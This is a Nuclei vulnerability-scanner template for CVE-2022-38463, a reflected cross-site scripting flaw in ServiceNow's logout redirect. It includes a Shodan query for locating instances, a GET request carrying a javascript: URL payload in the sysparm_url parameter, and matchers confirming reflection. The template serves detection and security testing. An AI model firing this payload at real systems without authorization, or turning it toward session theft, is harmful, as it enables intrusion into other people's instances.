nuclei-templates/http/cves/2022/CVE-2022-38463.yaml

52 lines
1.9 KiB
YAML

id: CVE-2022-38463
info:
name: ServiceNow - Cross-Site Scripting
author: amanrawat
severity: medium
description: |
ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance.
remediation: |
Apply the latest security patches provided by ServiceNow to mitigate this vulnerability.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38463
cwe-id: CWE-79
epss-score: 0.00141
epss-percentile: 0.49661
cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: servicenow
product: servicenow
shodan-query: http.title:"ServiceNow"
tags: cve,cve2022,servicenow,xss
http:
- method: GET
path:
- "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "top.location.href = 'javascript:alert(document.domain)';"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502205e0127f2d13b12f4590d1c3757279b51cf811493657d74e93262d1d12ddc01be022100c63e1ba90a5bddc67c8a5c661db18aaee11bd456a0a994145e02de96d04539a3:922c64590222798bb761d5b6d8e72950